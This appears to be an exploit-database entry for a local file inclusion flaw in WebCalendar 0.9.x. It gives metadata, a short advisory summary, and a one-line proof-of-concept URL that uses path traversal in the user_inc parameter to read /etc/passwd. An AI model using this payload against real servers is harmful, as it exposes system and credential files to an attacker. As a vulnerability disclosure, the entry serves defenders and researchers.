WebCalendar 0.9.x - Local File Inclusion Information Disclosure

Author: noconflic
type: webapps
platform: php
port: 
date_added: 2003-07-21 
date_updated: 2012-11-27 
verified: 1 
codes: OSVDB-53610 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/8237/info

It has been reported that an information disclosure issue exists in WebCalendar. This may allow an attacker to gain unauthorized read access to potentially sensitive information with the privileges of the web server process.

http://www.example.com/webcalendar/[filename].php?user_inc=../../../../../etc/passwd